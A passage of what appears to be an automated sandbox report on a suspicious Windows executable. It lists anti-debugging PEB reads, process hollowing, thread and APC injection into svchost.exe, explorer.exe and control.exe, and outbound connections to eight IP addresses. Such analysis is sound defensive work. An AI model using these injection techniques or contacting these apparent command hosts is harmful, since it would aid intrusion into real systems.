Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0366A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]	2_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]	2_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]	2_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]	2_2_036545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]	2_2_036545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]	2_2_03632582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]	2_2_03632582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]	2_2_03664588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]	2_2_0366E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]	2_2_036BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]	2_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]	2_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]	2_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]	2_2_036EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]	2_2_0362645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]	2_2_0365245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]	2_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]	2_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]	2_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]	2_2_0362C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]	2_2_0366A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]	2_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]	2_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]	2_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]	2_2_036304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]	2_2_036364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]	2_2_036644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_036BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]	2_2_036EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]	2_2_0362CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]	2_2_036E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]	2_2_036E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]	2_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]	2_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]	2_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]	2_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]	2_2_036C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]	2_2_036C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]	2_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]	2_2_036D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]	2_2_03628B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]	2_2_036DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]	2_2_0365EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]	2_2_0365EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]	2_2_036F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]	2_2_036F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]	2_2_03704B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]	2_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]	2_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]	2_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]	2_2_0365EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_036BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]	2_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]	2_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]	2_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]	2_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]	2_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]	2_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_036DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]	2_2_03640BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]	2_2_03640BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_036E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_036E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]	2_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]	2_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]	2_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h]	2_2_036DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]	2_2_036ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]	2_2_036ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]	2_2_03640A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]	2_2_03640A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]	2_2_0366CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]	2_2_0365EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]	2_2_03654A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]	2_2_03654A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]	2_2_0366CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]	2_2_036BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]	2_2_0366AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]	2_2_0366AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]	2_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]	2_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]	2_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]	2_2_03630AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]	2_2_03664AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]	2_2_03664AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]	2_2_03638AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]	2_2_03638AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]	2_2_03686AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]	2_2_03704A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]	2_2_03668A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]	2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]	2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]	2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]	2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]	2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]	2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]	2_2_036D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]	2_2_036D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]	2_2_036BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]	2_2_036B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704940 mov eax, dword ptr fs:[00000030h]	2_2_03704940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]	2_2_036B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]	2_2_036C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]	2_2_036AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]	2_2_036AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]	2_2_036BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]	2_2_03628918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]	2_2_03628918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_036BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]	2_2_036629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]	2_2_036629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]	2_2_036C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]	2_2_036649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_036FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]	2_2_036309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]	2_2_036309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]	2_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]	2_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]	2_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]	2_2_036BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]	2_2_036BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]	2_2_036C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]	2_2_036C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h]	2_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]	2_2_03660854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]	2_2_03634859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]	2_2_03634859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]	2_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]	2_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]	2_2_03652835

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DD81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00DD81F7

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DAA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00DAA395
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DAA364 SetUnhandledExceptionFilter,	0_2_00DAA364
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_00C942F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00C942F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_00C94550 SetUnhandledExceptionFilter,	4_2_00C94550

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe	Network Connect: 52.86.6.113 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 13.248.169.48 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 4056			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 4056			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\svchost.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: C90000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: AB5008

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DD8C93 LogonUserW,

0_2_00DD8C93

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00D83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00D83B4C

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

